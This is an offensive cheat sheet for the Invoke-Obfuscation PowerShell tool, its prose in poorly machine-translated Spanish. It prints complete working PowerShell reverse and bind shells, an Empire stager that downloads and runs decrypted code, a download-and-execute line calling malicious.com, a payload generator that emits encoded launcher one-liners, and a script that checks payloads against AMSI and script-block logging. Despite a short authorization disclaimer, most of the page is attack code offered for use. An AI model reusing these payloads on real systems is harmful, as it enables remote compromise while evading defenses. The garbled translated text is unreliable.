Invoke-Obfuscation Cheat Sheet

"Clase de la hoja" idbutton id="invoke-obfuscation-copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos

########################################################################################################################################################################################################################################################## Generar PDF seleccionado/button

■/div titulada

Sinopsis

La invocación es un poder Shell v2.0+ Potencia compatible Comando Shell y obfuscator de script. Fue diseñado para ayudar a los equipos rojos y a los probadores de penetración en eludir los antivirus, la aplicación de la lista blanca y otras medidas defensivas mediante la ocultación de scripts y comandos PowerShell. La herramienta proporciona múltiples técnicas de obfuscación, incluyendo la obfuscación basada en token, obfuscación de cadenas, codificación y compresión.

NOVEDAD Advertencia: Únicamente use Invoke-Obfuscation en entornos que posee o tenga permiso explícito para probar. El uso no autorizado puede violar términos de servicio o leyes locales. Esta herramienta está destinada únicamente a fines legítimos de pruebas de seguridad.

Instalación

Instalación de PowerShell Gallery

# Install from PowerShell Gallery (recommended)
Install-Module -Name Invoke-Obfuscation -Force

# Import the module
Import-Module Invoke-Obfuscation

# Verify installation
Get-Command -Module Invoke-Obfuscation

Instalación manual

# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/danielbohannon/Invoke-Obfuscation/archive/master.zip" -OutFile "Invoke-Obfuscation.zip"

# Extract the archive
Expand-Archive -Path "Invoke-Obfuscation.zip" -DestinationPath "C:\Tools\"

# Import the module
Import-Module "C:\Tools\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1"

# Or add to PowerShell profile for persistent loading
$ProfilePath = $PROFILE.AllUsersAllHosts
if (!(Test-Path $ProfilePath)) \\\\{ New-Item -Path $ProfilePath -ItemType File -Force \\\\}
Add-Content -Path $ProfilePath -Value "Import-Module C:\Tools\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1"

Git Instalación

# Clone the repository
git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
cd Invoke-Obfuscation

# Import in PowerShell
powershell -Command "Import-Module .\Invoke-Obfuscation.psd1"

Kali Linux Instalación

# Install PowerShell on Kali Linux
sudo apt update
sudo apt install -y powershell

# Start PowerShell
pwsh

# Install Invoke-Obfuscation
Install-Module -Name Invoke-Obfuscation -Force
Import-Module Invoke-Obfuscation

Uso básico

Modo interactivo

# Start interactive obfuscation session
Invoke-Obfuscation

# Set script to obfuscate
SET SCRIPTPATH C:\Scripts\payload.ps1

# Set script block to obfuscate
SET SCRIPTBLOCK \\\\{Get-Process; Get-Service\\\\}

# Show current settings
SHOW OPTIONS

# Show available obfuscation types
SHOW

# Get help
HELP

Modo de línea de mando

# Obfuscate a script file
Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1" -Quiet

# Obfuscate a script block
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "STRING\1" -Quiet

# Obfuscate with multiple techniques
Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1,ENCODING\1" -Quiet

# Save obfuscated output to file
Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1" -Quiet|Out-File "C:\Scripts\obfuscated.ps1"

Técnicas de obfusificación

Token Obfuscation

# Obfuscate all tokens with random case
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\ALL\1" -Quiet

# Obfuscate specific token types
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\COMMAND\1" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\COMMANDARGUMENT\1" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\MEMBER\1" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\VARIABLE\1" -Quiet

# Advanced token obfuscation
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\ALL\2" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\ALL\3" -Quiet

Obfuscation String

# Concatenate strings
Invoke-Obfuscation -ScriptBlock \\\\{'Hello World'\\\\} -Command "STRING\1" -Quiet

# Reorder strings
Invoke-Obfuscation -ScriptBlock \\\\{'Hello World'\\\\} -Command "STRING\2" -Quiet

# Reverse strings
Invoke-Obfuscation -ScriptBlock \\\\{'Hello World'\\\\} -Command "STRING\3" -Quiet

# Advanced string obfuscation
$script = \\\\{
    $message = "This is a test message"
    Write-Host $message
\\\\}
Invoke-Obfuscation -ScriptBlock $script -Command "STRING\1" -Quiet

Incoding Obfuscation

# ASCII encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\1" -Quiet

# Hex encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\2" -Quiet

# Octal encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\3" -Quiet

# Binary encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\4" -Quiet

# SecureString encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\5" -Quiet

# BXOR encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\6" -Quiet

# Special character encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\7" -Quiet

# Whitespace encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\8" -Quiet

Obfuscación de la compresión

# GZip compression
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process; Get-Service; Get-EventLog -LogName System -Newest 10\\\\} -Command "COMPRESS\1" -Quiet

# Deflate compression
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process; Get-Service; Get-EventLog -LogName System -Newest 10\\\\} -Command "COMPRESS\2" -Quiet

Obfuscación del lanzador

# PowerShell launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\PS\1" -Quiet

# CMD launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\CMD\1" -Quiet

# WMIC launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\WMIC\1" -Quiet

# Rundll32 launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\RUNDLL32\1" -Quiet

# VAR+ launcher (advanced)
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\VAR+\1" -Quiet

# STDIN+ launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\STDIN+\1" -Quiet

# CLIP+ launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\CLIP+\1" -Quiet

Obfuscación avanzada

Obfuscación de múltiples capas

# Apply multiple obfuscation techniques
$script = \\\\{
    $processes = Get-Process
    $services = Get-Service
    Write-Host "Found $($processes.Count) processes and $($services.Count) services"
\\\\}

# Layer 1: Token obfuscation
$obfuscated1 = Invoke-Obfuscation -ScriptBlock $script -Command "TOKEN\ALL\1" -Quiet

# Layer 2: String obfuscation
$obfuscated2 = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated1)) -Command "STRING\1" -Quiet

# Layer 3: Encoding
$obfuscated3 = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated2)) -Command "ENCODING\1" -Quiet

# Layer 4: Compression
$final = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated3)) -Command "COMPRESS\1" -Quiet

Write-Host $final

Cadenas de obfuscación personalizadas

# Define obfuscation chain
$obfuscationChain = @(
    "TOKEN\ALL\1",
    "STRING\2",
    "ENCODING\3",
    "LAUNCHER\PS\1"
)

# Apply chain to script
$script = \\\\{
    Invoke-WebRequest -Uri "http://malicious.com/payload.ps1"|Invoke-Expression
\\\\}

$result = $script
foreach ($command in $obfuscationChain) \\\\{
    $result = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($result)) -Command $command -Quiet
\\\\}

Write-Host $result

Obfuscación de carga útil

# Obfuscate Meterpreter payload
$meterpreterPayload = \\\\{
    $client = New-Object System.Net.Sockets.TCPClient("192.168.1.100",4444)
    $stream = $client.GetStream()
    [byte[]]$bytes = 0..65535|%\\\\{0\\\\}
    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) \\\\{
        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
        $sendback = (iex $data 2>&1|Out-String )
        $sendback2 = $sendback + "PS " + (pwd).Path + "> "
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()
    \\\\}
    $client.Close()
\\\\}

$obfuscatedMeterpreter = Invoke-Obfuscation -ScriptBlock $meterpreterPayload -Command "TOKEN\ALL\1,STRING\1,ENCODING\1" -Quiet

Empire/Covenant Payload Obfuscation

# Obfuscate Empire stager
$empireStager = \\\\{
    $wc=New-Object System.Net.WebClient
    $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
    $wc.Headers.Add('User-Agent',$u)
    $wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy
    $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
    $Script:Proxy = $wc.Proxy
    $K=[System.Text.Encoding]::ASCII.GetBytes('staging_key_here')
    $R=\\\\{$D,$K=$Args;$S=0..255;0..255|%\\\\{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]\\\\};$D|%\\\\{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]\\\\}\\\\}
    $ser='http://192.168.1.100:80'
    $t='/admin/get.php'
    $wc.Headers.Add("Cookie","session=value")
    $data=$wc.DownloadData($ser+$t)
    $iv=$data[0..3];$data=$data[4..$data.length]
    -join[Char[]](& $R $data ($IV+$K))|IEX
\\\\}

$obfuscatedEmpire = Invoke-Obfuscation -ScriptBlock $empireStager -Command "TOKEN\ALL\2,STRING\2,ENCODING\2,LAUNCHER\PS\1" -Quiet

Scripts de automatización

Batch Obfuscation Script

# Batch obfuscation script
param(
    [Parameter(Mandatory=$true)]
    [string]$InputDirectory,

    [Parameter(Mandatory=$true)]
    [string]$OutputDirectory,

    [string[]]$ObfuscationCommands = @("TOKEN\ALL\1", "STRING\1", "ENCODING\1")
)

# Create output directory if it doesn't exist
if (!(Test-Path $OutputDirectory)) \\\\{
    New-Item -ItemType Directory -Path $OutputDirectory -Force
\\\\}

# Get all PowerShell files
$psFiles = Get-ChildItem -Path $InputDirectory -Filter "*.ps1" -Recurse

foreach ($file in $psFiles) \\\\{
    Write-Host "[+] Processing: $($file.Name)"

    try \\\\{
        # Read the script content
        $scriptContent = Get-Content -Path $file.FullName -Raw
        $scriptBlock = [ScriptBlock]::Create($scriptContent)

        # Apply obfuscation
        $obfuscated = $scriptContent
        foreach ($command in $ObfuscationCommands) \\\\{
            Write-Host "  Applying: $command"
            $obfuscated = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated)) -Command $command -Quiet
        \\\\}

        # Save obfuscated script
        $outputPath = Join-Path $OutputDirectory "$($file.BaseName)_obfuscated.ps1"
        $obfuscated|Out-File -FilePath $outputPath -Encoding UTF8

        Write-Host "  ✓ Saved: $outputPath"

    \\\\} catch \\\\{
        Write-Host "  ✗ Error: $($_.Exception.Message)" -ForegroundColor Red
    \\\\}
\\\\}

Write-Host "[+] Batch obfuscation completed"

Payload Generator Script

# Advanced payload generator with obfuscation
param(
    [Parameter(Mandatory=$true)]
    [string]$LHOST,

    [Parameter(Mandatory=$true)]
    [int]$LPORT,

    [string]$PayloadType = "reverse_tcp",
    [string]$OutputPath = ".\obfuscated_payload.ps1",
    [string[]]$ObfuscationLevels = @("TOKEN\ALL\1", "STRING\1", "ENCODING\1")
)

# Define payload templates
$payloadTemplates = @\\\\{
    "reverse_tcp" = @"
`$client = New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT)
`$stream = `$client.GetStream()
[byte[]]`$bytes = 0..65535|%\\\\{0\\\\}
while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0) \\\\{
    `$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i)
    `$sendback = (iex `$data 2>&1|Out-String)
    `$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> '
    `$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2)
    `$stream.Write(`$sendbyte,0,`$sendbyte.Length)
    `$stream.Flush()
\\}
`$client.Close()
"@

    "reverse_http" = @"
`$wc = New-Object System.Net.WebClient
`$wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36')
while(`$true) \\{
    try \\{
        `$command = `$wc.DownloadString('http://$LHOST`:$LPORT/command')
        if (`$command) \\{
            `$result = iex `$command 2>&1|Out-String
            `$wc.UploadString('http://$LHOST`:$LPORT/result', `$result)
        \\\\}
        Start-Sleep -Seconds 5
    \\\\} catch \\\\{
        Start-Sleep -Seconds 10
    \\\\}
\\\\}
"@

    "bind_tcp" = @"
`$listener = [System.Net.Sockets.TcpListener]$LPORT
`$listener.Start()
`$client = `$listener.AcceptTcpClient()
`$stream = `$client.GetStream()
[byte[]]`$bytes = 0..65535|%\\{0\\}
while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0) \\{
    `$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i)
    `$sendback = (iex `$data 2>&1|Out-String)
    `$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> '
    `$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2)
    `$stream.Write(`$sendbyte,0,`$sendbyte.Length)
    `$stream.Flush()
\\\\}
`$client.Close()
`$listener.Stop()
"@
\\\\}

# Generate base payload
if ($payloadTemplates.ContainsKey($PayloadType)) \\\\{
    $basePayload = $payloadTemplates[$PayloadType]
    Write-Host "[+] Generated $PayloadType payload for $LHOST`:$LPORT"
\\} else \\{
    Write-Host "[-] Unknown payload type: $PayloadType" -ForegroundColor Red
    return
\\}

# Apply obfuscation
$obfuscatedPayload = $basePayload
foreach ($level in $ObfuscationLevels) \\{
    Write-Host "[+] Applying obfuscation: $level"
    $obfuscatedPayload = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscatedPayload)) -Command $level -Quiet
\\}

# Save to file
$obfuscatedPayload|Out-File -FilePath $OutputPath -Encoding UTF8
Write-Host "[+] Obfuscated payload saved to: $OutputPath"

# Generate launcher commands
Write-Host "`n[+] Launcher commands:"
Write-Host "PowerShell: powershell.exe -ExecutionPolicy Bypass -File `"$OutputPath`""
Write-Host "Encoded: powershell.exe -EncodedCommand $([Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($obfuscatedPayload)))"

# Generate one-liner
$oneLiner = $obfuscatedPayload -replace "`r`n", "; " -replace "`n", "; "
Write-Host "`n[+] One-liner:"
Write-Host "powershell.exe -Command `"$oneLiner`""

Guión de prueba de evasión

# Test obfuscated payloads against AMSI and other defenses
param(
    [Parameter(Mandatory=$true)]
    [string]$PayloadPath,

    [switch]$TestAMSI,
    [switch]$TestExecutionPolicy,
    [switch]$TestScriptBlockLogging,
    [switch]$All
)

if ($All) \\\\{
    $TestAMSI = $true
    $TestExecutionPolicy = $true
    $TestScriptBlockLogging = $true
\\\\}

Write-Host "[+] Testing payload: $PayloadPath"

# Read payload
$payload = Get-Content -Path $PayloadPath -Raw

# Test AMSI
if ($TestAMSI) \\\\{
    Write-Host "`n[+] Testing AMSI detection..."

    try \\{
        # Check if AMSI detects the payload
        $amsiContext = [System.IntPtr]::Zero
        $amsiSession = [System.IntPtr]::Zero

        # This is a simplified test - in reality, AMSI testing is more complex
        $result = [System.Management.Automation.AmsiUtils]::ScanContent($payload, "test")

        if ($result -eq "Clean") \\{
            Write-Host "  ✓ AMSI: Clean" -ForegroundColor Green
        \\} else \\{
            Write-Host "  ✗ AMSI: Detected" -ForegroundColor Red
        \\}
    \\} catch \\{
        Write-Host "  ? AMSI: Unable to test" -ForegroundColor Yellow
    \\}
\\}

# Test Execution Policy
if ($TestExecutionPolicy) \\{
    Write-Host "`n[+] Testing Execution Policy bypass..."

    $currentPolicy = Get-ExecutionPolicy
    Write-Host "  Current policy: $currentPolicy"

    if ($currentPolicy -eq "Restricted" -or $currentPolicy -eq "AllSigned") \\\\{
        Write-Host "  ⚠ Restrictive policy detected" -ForegroundColor Yellow
        Write-Host "  Bypass methods:"
        Write-Host "    powershell.exe -ExecutionPolicy Bypass -File `"$PayloadPath`""
        Write-Host "    powershell.exe -Command `"Set-ExecutionPolicy Bypass -Scope Process; & '$PayloadPath'`""
    \\\\} else \\\\{
        Write-Host "  ✓ Policy allows execution" -ForegroundColor Green
    \\\\}
\\\\}

# Test Script Block Logging
if ($TestScriptBlockLogging) \\\\{
    Write-Host "`n[+] Testing Script Block Logging evasion..."

    $logPolicy = Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -ErrorAction SilentlyContinue

    if ($logPolicy -and $logPolicy.EnableScriptBlockLogging -eq 1) \\{
        Write-Host "  ⚠ Script Block Logging is enabled" -ForegroundColor Yellow
        Write-Host "  Consider additional obfuscation or AMSI bypass"
    \\} else \\{
        Write-Host "  ✓ Script Block Logging not detected" -ForegroundColor Green
    \\}
\\}

# Test payload execution (dry run)
Write-Host "`n[+] Testing payload syntax..."
try \\\\{
    $scriptBlock = [ScriptBlock]::Create($payload)
    Write-Host "  ✓ Syntax is valid" -ForegroundColor Green
\\\\} catch \\\\{
    Write-Host "  ✗ Syntax error: $($_.Exception.Message)" -ForegroundColor Red
\\\\}

Write-Host "`n[+] Testing completed"

Integración con los marcos de ataque

Integración Metasploit

# Generate obfuscated Metasploit payload
$msfPayload = @"
`$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444)
`$stream = `$client.GetStream()
[byte[]]`$bytes = 0..65535|%\\{0\\}
while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0) \\{
    `$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i)
    `$sendback = (iex `$data 2>&1|Out-String)
    `$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> '
    `$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2)
    `$stream.Write(`$sendbyte,0,`$sendbyte.Length)
    `$stream.Flush()
\\\\}
`$client.Close()
"@

# Obfuscate for Metasploit
$obfuscatedMSF = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($msfPayload)) -Command "TOKEN\ALL\1,STRING\1,ENCODING\1,LAUNCHER\PS\1" -Quiet

# Save for use with Metasploit
$obfuscatedMSF|Out-File -FilePath "msf_payload_obfuscated.ps1"

Empire Integration

# Obfuscate Empire stager
$empireStager = \\{
    # Empire stager code here
    $wc=New-Object System.Net.WebClient
    $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
    $wc.Headers.Add('User-Agent',$u)
    # ... rest of Empire stager
\\}

# Apply heavy obfuscation for Empire
$obfuscatedEmpire = Invoke-Obfuscation -ScriptBlock $empireStager -Command "TOKEN\ALL\2,STRING\2,ENCODING\2,COMPRESS\1,LAUNCHER\VAR+\1" -Quiet

Integración del Pacto

# Obfuscate Covenant Grunt
$covenantGrunt = \\{
    # Covenant Grunt code here
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = \\{$true\\}
    $wc = New-Object System.Net.WebClient
    # ... rest of Covenant Grunt
\\}

# Apply obfuscation for Covenant
$obfuscatedCovenant = Invoke-Obfuscation -ScriptBlock $covenantGrunt -Command "TOKEN\ALL\1,STRING\1,ENCODING\3,LAUNCHER\RUNDLL32\1" -Quiet

Solución de problemas

Cuestiones comunes

Problemas de importación de módulos

# Fix module import issues
Import-Module Invoke-Obfuscation -Force

# Check module location
Get-Module -ListAvailable|Where-Object \\{$_.Name -like "*Obfuscation*"\\}

# Manual import
Import-Module "C:\Path\To\Invoke-Obfuscation.psd1"

# Check PowerShell execution policy
Get-ExecutionPolicy
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

Errores de obfuscación

# Debug obfuscation issues
$ErrorActionPreference = "Stop"
try \\{
    $result = Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "TOKEN\ALL\1" -Quiet
\\} catch \\{
    Write-Host "Error: $($_.Exception.Message)"
    Write-Host "Stack Trace: $($_.ScriptStackTrace)"
\\}

# Test with simpler commands
Invoke-Obfuscation -ScriptBlock \\{Write-Host "Test"\\} -Command "STRING\1" -Quiet

# Check PowerShell version compatibility
$PSVersionTable.PSVersion

Cuestiones de ejecución

# Optimize for large scripts
$script = Get-Content -Path "large_script.ps1" -Raw

# Use simpler obfuscation for large scripts
$obfuscated = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($script)) -Command "TOKEN\COMMAND\1" -Quiet

# Process in chunks for very large scripts
$lines = Get-Content -Path "large_script.ps1"
$chunkSize = 100
for ($i = 0; $i -lt $lines.Count; $i += $chunkSize) \\{
    $chunk = $lines[$i..($i + $chunkSize - 1)] -join "`n"
    # Process chunk
\\\\}

Depuración y pruebas

# Test obfuscated script execution
$obfuscated = Invoke-Obfuscation -ScriptBlock \\\\{Get-Date\\\\} -Command "TOKEN\ALL\1" -Quiet

# Execute obfuscated script
Invoke-Expression $obfuscated

# Compare original vs obfuscated output
$original = Get-Date
$obfuscatedResult = Invoke-Expression $obfuscated
Compare-Object $original $obfuscatedResult

# Validate script syntax
$scriptBlock = [ScriptBlock]::Create($obfuscated)
$scriptBlock.CheckRestrictedLanguage($false)

Recursos

• Repositorio Oficial de Facturación-Obfuscation
• PowerShell Obfuscation Techniques
• MSI Bypass Techniques
• PowerShell Security Best Practices
• Script Block Logging
• PowerShell Execution Policies
• Red Team PowerShell Techniques

-...

*Esta hoja de trampolín proporciona una referencia completa para el uso de Invoke-Obfuscation para PowerShell script y el comando obfuscation. Siempre asegúrese de tener una autorización adecuada antes de usar esta herramienta en cualquier entorno. *